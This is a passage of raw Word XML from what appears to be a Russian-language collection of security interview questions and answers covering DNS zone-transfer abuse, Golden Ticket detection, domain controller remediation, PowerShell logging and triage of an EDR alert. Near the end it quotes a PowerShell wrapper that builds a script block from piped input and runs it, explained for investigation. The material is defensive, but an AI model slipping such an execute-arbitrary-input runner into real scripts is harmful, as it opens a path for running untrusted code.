настройте систему так, чтобы отключить JavaScript и другое активное содержимое в .chmфайлах, если это возможно.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Регулярные обновления : поддерживайте свою операционную систему и программное обеспечение в актуальном состоянии, чтобы защититься от известных уязвимостей.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Антивирусное программное обеспечение : используйте антивирусное программное обеспечение или программное обеспечение для защиты конечных точек, которое сканирует и блокирует вредоносные файлы.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Осведомленность пользователей : информируйте пользователей о рисках, связанных с открытием файлов из ненадежных источников.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.chm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Файлы могут быть опасны из-за их способности содержать и выполнять вредоносные скрипты и использовать уязвимости в Windows HTML Help Viewer. Они могут использоваться в различных атаках, включая социальную инженерию и распространение вредоносного ПО. Применение превентивных мер и поддержание современных методов безопасности может помочь снизить риски, связанные с .chmфайлами.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_____________________________________________</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logs from DNS server, and you see lot of AXFR requests from one external IP. Is it malicious? If so, why?</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Наблюдение большого количества запросов AXFR (передача зоны) с внешнего IP-адреса в журналах вашего DNS-сервера действительно может быть признаком потенциальной угрозы безопасности. Вот почему эта активность может быть вредоносной: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Понимание запросов AXFR</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Обзор AXFR : AXFR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это тип записи DNS (Domain Name System), используемый для полных передач зон. Когда DNS-сервер выполняет запрос AXFR, он по сути запрашивает полную копию файла зоны DNS с другого DNS-сервера. Этот файл содержит все записи DNS для домена, включая информацию о поддоменах, IP-адресах, почтовых серверах и т. д.</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Законное использование : Зональные передачи обычно используются для репликации между первичными и вторичными DNS-серверами. В законной настройке зонные передачи выполняются между авторизованными серверами в сети организации или между доверенными партнерами.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Почему множественные запросы AXFR могут быть вредоносными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Сбор информации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Разведка : Внешние запросы на переносы зон часто являются частью разведывательных усилий злоумышленников. Получив полный файл зоны, злоумышленник может собрать подробную информацию о вашем домене, включая все связанные поддомены и потенциально полезные детали инфраструктуры.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Подготовка к атаке : используя эту информацию, злоумышленники могут определить потенциальные цели внутри организации, такие как внутренние службы, серверы электронной почты или другие критические системы.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Неправильно настроенные DNS-серверы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Открытые передачи зон : если ваш DNS-сервер настроен на разрешение передачи зон на любой внешний IP-адрес, он может непреднамеренно раскрыть конфиденциальную информацию. Это распространенная ошибка конфигурации, которая может привести к утечке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Отсутствие ограничений : правильно настроенные DNS-серверы должны ограничивать передачу зон только авторизованными IP-адресами. Если вы видите многочисленные запросы AXFR с внешнего IP-адреса, это может означать, что ваш сервер не защищен должным образом.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Потенциальная утечка данных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Кража данных : злоумышленник, использующий запросы AXFR для извлечения данных, может собирать сведения для последующего использования в целевых атаках или для использования информации в других вредоносных действиях.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Шаги по расследованию и смягчению последствий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конфигурацию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Контроль доступа : проверьте настройки DNS-сервера, чтобы убедиться, что передача зон ограничена только доверенными IP-адресами или определенными серверами в вашей сети.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Журналы аудита : просмотрите журналы DNS-сервера на предмет любых других подозрительных действий или закономерностей.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Блокировка вредоносных IP-адресов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Правила брандмауэра : реализуйте правила брандмауэра или политики сетевой безопасности, чтобы заблокировать отправку запросов на передачу зоны с несанкционированных IP-адресов.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Обновление политик безопасности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Безопасность DNS : реализуйте лучшие практики безопасности DNS, включая ограничение запросов AXFR, использование TSIG (подписи транзакций) для безопасной передачи зон и поддержание программного обеспечения DNS в актуальном состоянии.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и реагирование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Постоянный мониторинг : постоянно отслеживайте журналы DNS-сервера на предмет необычных закономерностей и оперативно реагируйте на любые признаки потенциальной угрозы.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 если вы подозреваете, что запросы AXFR являются частью более широкой атаки, инициируйте процедуры реагирования на инциденты, чтобы оценить и смягчить любое потенциальное воздействие.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Большое количество запросов AXFR с внешнего IP-адреса является красным флагом и может указывать на вредоносную активность, такую ​​как разведка или кража данных. Передача зон должна быть ограничена авторизованными и доверенными источниками, чтобы предотвратить несанкционированный доступ к вашей информации DNS. Регулярный просмотр и обеспечение безопасности конфигураций DNS, а также мониторинг подозрительных действий являются важнейшими шагами в защите от потенциальных угроз.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="990" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="99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_______________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>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can you detect Golden Ticket attack?</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Атака Golden Ticket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это тип атаки Kerberos Tickets, при которой злоумышленник подделывает Ticket Granting Ticket (TGT), чтобы получить несанкционированный доступ к ресурсам в домене. Эта атака включает в себя эксплуатацию протокола аутентификации Kerberos в средах Active Directory и обнаружение i</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Отслеживайте подозрительную активность билетов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Unusual Ticket Times: Golden Tickets can have arbitrary expiration dates. Look for tickets with unusual or extended expiration times, which deviate from normal patterns.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Большое количество запросов TGT : Большое количество запросов TGT от одного компьютера или пользователя может быть признаком атаки Golden Ticket.</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Запросы билетов Kerberos : отслеживайте необычные запросы или шаблоны в запросах на выдачу билетов Kerberos. Например, повторные запросы билетов для учетных записей с высокими привилегиями могут указывать на злоупотребление.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Анализ журналов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4769 : В журналах безопасности Windows идентификатор события 4769 представляет запрос билета службы Kerberos. Ищите аномалии, такие как выдача билетов для учетных записей, которые не должны иметь доступа, или для машин, которые не являются типичными.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4770 : Это событие указывает на то, что билет службы Kerberos был обновлен. Частые обновления из неожиданных источников могут быть красным флагом.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Идентификатор события 4624 : Успешные события входа в систему следует проверять на наличие необычных учетных записей или необычного времени входа.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Обнаружение аномального поведения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Необычная активность учетной записи : ищите учетные записи, которые демонстрируют необычные схемы доступа или имеют повышенные привилегии, не соответствующие их обычной деятельности.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Повышение привилегий : проверьте наличие признаков повышения привилегий, которые не были инициированы в рамках обычных административных процессов.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Отслеживайте необычное поведение пользователей и системы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Изменения в системе : обратите внимание на неожиданные изменения в конфигурациях системы, такие как создание новых учетных записей или изменения в разрешениях пользователей.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Запросы аутентификации : отслеживайте журналы аутентификации на предмет запросов от машин или пользователей, которые обычно не участвуют в высокопривилегированных действиях.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Используйте специализированные инструменты и методы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протокола Kerberos : такие инструменты, как Rubeus или Mimikatz, могут использоваться для взаимодействия с билетами Kerberos и могут помочь выявить аномальную активность билетов, если ее используют злоумышленники.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Управление информацией и событиями безопасности (SIEM) : внедрение системы SIEM для корреляции и анализа журналов, связанных с билетами Kerberos, а также создание настраиваемых оповещений о подозрительном поведении.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Обзор среды Active Directory</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Аккаунт KRBTGT : Регулярно контролируйте и защищайте аккаунт KRBTGT, который является ключевым аккаунтом, используемым для шифрования и дешифрования TGT. Если этот аккаунт будет скомпрометирован, это может привести к созданию Golden Ticket.</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Разрешения учетной записи : убедитесь, что в вашем Active Directory нет неавторизованных или высокопривилегированных учетных записей.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Используйте программное обеспечение для обнаружения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и реагирование на конечные точки (EDR) : решения EDR могут помочь в обнаружении аномалий, связанных с атаками Golden Ticket, путем анализа моделей поведения на конечных точках.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Аналитика угроз : Обновляйте свои каналы аналитики угроз, чтобы быть в курсе новых методов и индикаторов, связанных с атаками Kerberos.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8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Регулярно проверяйте и обновляйте меры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Управление исправлениями : убедитесь, что все системы и приложения обновлены до последних исправлений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План реагирования на инциденты : Разработайте план реагирования на инциденты для устранения потенциальных атак Golden Ticket, включая процедуры анализа и смягчения последствий таких атак.</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Обнаружение атаки Golden Ticket включает мониторинг необычной активности билетов Kerberos, анализ журналов безопасности на предмет аномальных шаблонов и использование специализированных инструментов для проверки билетов Kerberos. Регулярные проверки конфигураций Active Directory и учетной записи KRBTGT в сочетании с упреждающими мерами безопасности могут помочь в выявлении и снижении рисков, связанных с атаками Golden Ticket.</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53"/>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that attacker compromises your domain controller. Propose a remediation scenario for this situation.</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Если злоумышленник скомпрометирует контроллер домена (DC), это критическая ситуация, которая требует немедленного и комплексного исправления, чтобы сдержать нарушение, смягчить ущерб и восстановить безопасность. Вот пошаговый сценарий исправления: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Немедленный ответ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Изолируйте скомпрометированный контроллер домена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Отключение от сети : немедленно изолируйте скомпрометированный DC от сети, чтобы предотвратить дальнейшее распространение атаки и дополнительный несанкционированный доступ.</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Удалить доступ : отключите сетевой доступ для скомпрометированного контроллера домена, чтобы остановить любую продолжающуюся вредоносную активность.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Группа реагирования на инциденты с оповещением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Уведомление : сообщите о нарушении своей группе реагирования на инциденты и основным заинтересованным сторонам.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Документация : начните документировать все предпринятые действия, включая временные метки, изменения и результаты.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Сдержать атаку</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Определить и заблокировать доступ злоумышленника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Изменение учетных данных администратора : изменение паролей для всех привилегированных учетных записей, особенно учетных записей администраторов домена, во всех системах.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Аудит учетных записей : Проверьте все учетные записи на DC на предмет несанкционированных добавлений или изменений. Отключите или удалите любые подозрительные учетные записи.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Расследование и анализ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Просмотрите журналы : проанализируйте журналы безопасности на DC и других связанных системах, чтобы определить действия, инструменты и методы злоумышленника.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сети : проведите анализ сети, чтобы определить, переместился ли злоумышленник в другие системы.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Меры по исправлению ситуации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Удалить инструменты и вредоносное ПО злоумышленников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Сканирование на наличие вредоносного ПО : используйте антивирусные и антивредоносные инструменты для сканирования и удаления любого вредоносного ПО, обнаруженного на контроллере домена.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Криминалистический анализ : проведите криминалистический анализ, чтобы понять вектор атаки и инструменты, используемые злоумышленником.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Восстановить и перестроить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Восстановление из резервной копии : если возможно, восстановите DC из чистой резервной копии, которая была сделана до компрометации. Убедитесь, что резервная копия проверена как чистая.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Перестроить DC : во многих случаях может быть безопаснее перестроить DC с нуля. Это включает в себя переустановку операционной системы и Active Directory, а также восстановление данных из известных хороших резервных копий.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c. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Безопасный и укрепленный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Исправления и обновления : примените все соответствующие исправления и обновления к DC и другим системам, чтобы закрыть все уязвимости, которые были использованы.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Усиление безопасности : реализация мер по усилению безопасности, таких как отключение неиспользуемых служб, реализация доступа с минимальными привилегиями, а также улучшение мониторинга и оповещения.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Проверка и восстановление операций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Проверка целостности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целостность данных : убедитесь, что сохраняется целостность данных и не было внесено несанкционированных изменений.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Тестирование функциональности : тестирование функциональности Active Directory и других критически важных служб, чтобы убедиться в их корректной работе.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Повторное подключение к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Контролируемое повторное подключение : постепенное повторное подключение очищенного или восстановленного ЦОД к сети, начиная с ограниченной области, чтобы отслеживать любые дальнейшие проблемы.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Действия после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Провести посмертный анализ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первопричин : проведите тщательное расследование, чтобы определить, как злоумышленник получил доступ и какие уязвимости были использованы.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Извлеченные уроки : документируйте извлеченные уроки и соответствующим образом обновите план реагирования на инциденты.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Пересмотреть и обновить политику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Усиление мер безопасности : обновление и укрепление политик безопасности, в том числе связанных с аутентификацией, контролем доступа и мониторингом.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Проведение обучения : проведение дополнительного обучения персонала по распознаванию и реагированию на угрозы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 Общайтесь с заинтересованными сторонами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Отчетность : Предоставьте заинтересованным сторонам подробный отчет, включая характер нарушения, последствия и шаги, предпринятые для его устранения.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Публичное раскрытие информации : при необходимости подготовьте и опубликуйте публичное раскрытие информации или уведомление в соответствии с правовыми и нормативными требованиями.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Постоянный мониторинг и улучшение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Постоянный мониторинг</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Расширенный мониторинг : внедрите расширенный мониторинг для обнаружения любых признаков остаточных или новых угроз.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Регулярные аудиты : проводите регулярные аудиты безопасности и оценки уязвимостей для выявления и устранения потенциальных слабых мест.</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Обновление плана реагирования на инциденты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Обзор и обновление : постоянно пересматривайте и обновляйте свой план реагирования на инциденты, чтобы учесть новые угрозы и уроки, извлеченные из инцидента.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Исправление скомпрометированного контроллера домена включает немедленную изоляцию и сдерживание, тщательное расследование и удаление инструментов злоумышленника, восстановление и перестройку DC, обеспечение безопасности среды и выполнение анализа после инцидента. Эффективная коммуникация с заинтересованными сторонами и постоянное совершенствование мер безопасности также имеют решающее значение для предотвращения будущих инцидентов.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55"/>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best PowerShell 5 feature for security team?</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PowerShell 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">представил несколько функций, которые очень полезны для групп безопасности, но одной из выдающихся функций для повышения безопасности является </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">«PowerShell ScriptBlock Logging» . </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Эта функция особенно ценна для обнаружения и смягчения вредоносных действий.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PowerShell ScriptBlock </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Ведение журнала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Обзор</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ScriptBlock Logging : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">эта функция записывает содержимое скриптов и команд PowerShell, выполняемых в системе, включая те, которые выполняются в памяти. Это имеет решающее значение для групп безопасности, поскольку обеспечивает видимость выполняемых команд и помогает выявлять потенциально вредоносные действия.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Основные преимущества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Видимость выполнения : ScriptBlock Logging захватывает и регистрирует полное содержимое блоков скриптов PowerShell, включая те, которые генерируются динамически или запутываются, что часто используется в атаках для обхода обнаружения.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Расширенная криминалистика : регистрируя подробное выполнение команд, он обеспечивает более эффективный криминалистический анализ и реагирование на инциденты. Группы безопасности могут просматривать эти журналы, чтобы понять характер атаки, использованные инструменты и воздействие.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вредоносной активности : помогает обнаружить шаблоны поведения, характерные для атак, такие как выполнение известных вредоносных скриптов или необычных последовательностей команд.</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Реализация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включить ScriptBlock Logging в PowerShell 5, вам нужно настроить параметры групповой политики или изменить реестр Windows. Вот общее руководство по его включению:</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групповой политики :</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Откройте консоль управления групповой политикой ( gpmc.msc).</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Перейдите в Конфигурация компьютера &gt; Административные шаблоны &gt; Компоненты Windows &gt; Windows PowerShell .</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Включите параметр Включить ведение журнала блоков скриптов PowerShell .</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Использование реестра :</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Откройте редактор реестра ( regedit).</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Перейдите к HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell.</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Создайте или измените EnableScriptBlockLoggingзначение DWORD и задайте ему значение 1.</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Соображения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Влияние на производительность : ScriptBlock Logging может генерировать большой объем данных журнала, что может повлиять на производительность и увеличить требования к хранилищу. Убедитесь, что у вас достаточно ресурсов и емкости хранилища.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Управление журналами : Внедрите надежную систему управления и анализа журналов для обработки и анализа потенциально больших объемов данных, генерируемых ScriptBlock Logging.</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Другие примечательные возможности PowerShell 5</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Хотя ведение журнала ScriptBlock очень эффективно для обеспечения безопасности, есть и другие функции PowerShell 5, которые также полезны для групп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Расширенный ограниченный языковой режим : повышает безопасность, ограничивая возможности PowerShell в ненадежных средах, снижая риск эксплуатации.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Just Enough Administration (JEA) : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">позволяет делегировать административные привилегии с минимальным риском, снижая риск атак с целью повышения привилегий.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Транскрипция PowerShell : фиксирует все входные и выходные данные сеансов PowerShell, предоставляя полную запись активности PowerShell.</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ScriptBlock Logging </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">в PowerShell 5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одна из самых эффективных функций для групп безопасности, поскольку она обеспечивает детальную видимость выполняемых скриптов и команд, что необходимо для обнаружения и расследования потенциальных угроз безопасности. Реализация ScriptBlock Logging вместе с другими функциями безопасности PowerShell повышает общую безопасность и помогает поддерживать безопасную и соответствующую требованиям среду.</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>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got an alert from EDR solution and you have only this information:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="99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Process: flashhelperservice.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="99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PID: 6508</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="99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OS Type: windows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="99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MD5: 59c34bc243eb2604533b5f08d30944f8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="99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SHA-256: ef214626923d76e24ae5299dd16c53b15847e91a97d2eea79ce951c6bead9b7c</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can you tell about this case? </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проанализировать оповещение решения Endpoint Detection and Response (EDR) относительно процесса flashhelperservice.exeс предоставленными подробностями, вам следует выполнить следующие шаги, чтобы понять, является ли это законным процессом или потенциально вредоносным. Вот как подойти к этому случаю:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="990" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>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FF0000"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Первоначальное расследование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Анализ процесса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Имя процесса : flashhelperservice.exeне является общим системным процессом Windows и часто ассоциируется со сторонним программным обеспечением. Имя может использоваться легитимным программным обеспечением или вредоносным ПО.</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PID (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">идентификатор процесса) : PID (6508) сам по себе не дает много информации, но он помогает идентифицировать конкретный экземпляр процесса в вашей системе.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Анализ хэша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Хэш MD5 :59c34bc243eb2604533b5f08d30944f8</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SHA-256 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Хэш :ef214626923d76e24ae5299dd16c53b15847e91a97d2eea79ce951c6bead9b7c</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Вы можете использовать эти хэши для проверки известной информации об этом файле. Вот что вам следует сделать:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="990" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>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Поиск хеша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VirusTotal Scan</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Загрузите файл : Если возможно, загрузите файл, связанный с этими хэшами, на VirusTotal . VirusTotal объединяет результаты нескольких антивирусных движков и может указать, распознан ли файл как вредоносный.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результаты : посмотрите на результаты хэшей MD5 и SHA-256. Если несколько антивирусных движков помечают файл как вредоносный или подозрительный, это весомый признак того, что файл может представлять угрозу.</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Разведка угроз</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Поиск хэшей : используйте платформы или базы данных по анализу угроз, такие как Hybrid Analysis , Malwr или другие службы анализа угроз для поиска хэшей. Эти платформы могут иметь дополнительный контекст или исторические данные.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Сбор информации о файлах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Проверить местоположение файла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Путь к файлу : Исследуйте местоположение файла на диске. Законные процессы обычно находятся в стандартных каталогах, таких как C:\Program Files\или C:\Windows\System32\. Необычные или скрытые каталоги могут быть красным флагом.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Анализ метаданных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Свойства файла : проверьте свойства файла, такие как цифровые подписи, информацию об издателе и номера версий. Легитимные файлы обычно имеют действительную цифровую подпись и идентифицируемую информацию об издателе.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Поведенческий анализ</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Поведение монитора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Активность процесса : используйте решение EDR или другие криминалистические инструменты для наблюдения за поведением процесса, включая сетевую активность, изменения файловой системы и модификации реестра.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Подозрительная активность : обратите внимание на любую необычную активность, связанную с процессом, например, на неожиданные сетевые подключения, попытки избежать обнаружения или изменения в системных файлах.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Сравните с известными угрозами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вредоносного ПО : Сравните поведение и свойства этого процесса с известными семействами вредоносных программ. Некоторые вредоносные программы используют имена и методы для имитации легитимных процессов.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Влияние на систему и сеть</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Проверка механизмов устойчивости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Записи запуска : проверьте, создал ли процесс какие-либо записи запуска или механизмы сохранения. Это может включать изменения HKCU\Software\Microsoft\Windows\CurrentVersion\Runили аналогичные местоположения.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Анализ сетевого трафика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Исходящие соединения : проанализируйте, создает ли процесс необычные исходящие сетевые соединения, особенно к известным вредоносным IP-адресам или доменам.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Ответные действия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 Карантин и высылка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Карантин : если файл признан вредоносным, поместите его в карантин, чтобы предотвратить дальнейшее выполнение.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Удаление : следуйте стандартным процедурам удаления вредоносного ПО из системы, включая очистку любых связанных артефактов или изменений, внесенных вредоносным ПО.</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 Отчет об инциденте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Документация : документируйте все выводы, предпринятые действия и любое наблюдаемое воздействие. Это помогает понять атаку и улучшить будущую защиту.</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Учитывая оповещение о flashhelperservice.exe, вам следует:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="990" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>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имя процесса и проверьте, связано ли оно с известным программным обеспечением.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Найдите хеши MD5 и SHA-256 с помощью VirusTotal и других источников информации об угрозах.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Изучите местоположение файла и метаданные, чтобы определить его легитимность.</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Контролируйте поведение процесса и проверяйте на наличие подозрительной активности.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Примите соответствующие меры реагирования на основе полученных результатов, включая карантин, удаление и документирование.</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Выполнив эти шаги, вы сможете определить, flashhelperservice.exeпредставляет ли собой проблема угрозу безопасности, и принять соответствующие меры для ее устранения.</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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During the investigation you see this information:</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&amp;chcp.com 65001 &gt; $null</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$exec_wrapper_str = $input | Out-String</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$split_parts = $exec_wrapper_str.Split(@("`0`0`0`0"), 2, [StringSplitOptions]::RemoveEmptyEntries)</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If (-not $split_parts.Length -eq 2) { throw "invalid payload"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Set-Variable -Name json_raw -Value $split_parts[1]</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$exec_wrapper = [ScriptBlock]::Create($split_parts[0])</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&amp;$exec_wrapper</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="99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</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Предоставленный скрипт PowerShell предназначен для обработки и выполнения полезной нагрузки. Вот описание того, что делает скрипт, и его последствия:</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Разбор сценария</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Изменить кодовую страницу:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="99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&amp;chcp.com 65001 &gt; $null</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Эта команда устанавливает кодовую страницу командной строки на UTF-8 (65001). Перенаправление вывода на $nullгарантирует, что вывод команды будет отброшен. Это можно использовать для правильной обработки данных в кодировке UTF-8.</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Чтение и обработка входных данных:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="990" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec_wrapper_str = $input | Out-String</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Это преобразует входные данные (вероятно, скрипт или полезную нагрузку) в строку и сохраняет ее в $exec_wrapper_str.</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Разделить входные данные:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="99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$split_parts = $exec_wrapper_str.Split(@("`0`0`0`0"), 2, [StringSplitOptions]::RemoveEmptyEntries)</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Скрипт пытается разделить входную строку на части, используя разделитель " 00 00" (который представляет четыре нулевых символа). Этот разделитель используется для разделения полезной нагрузки на две части.</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Проверить разделенные части:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="990" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">If (-not $split_parts.Length -eq 2) { throw "invalid payload" }</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Скрипт проверяет, получилось ли в результате разделения ровно две части. Если нет, он выдает ошибку, указывающую на недопустимую полезную нагрузку.</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Назначить и создать ScriptBlock:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
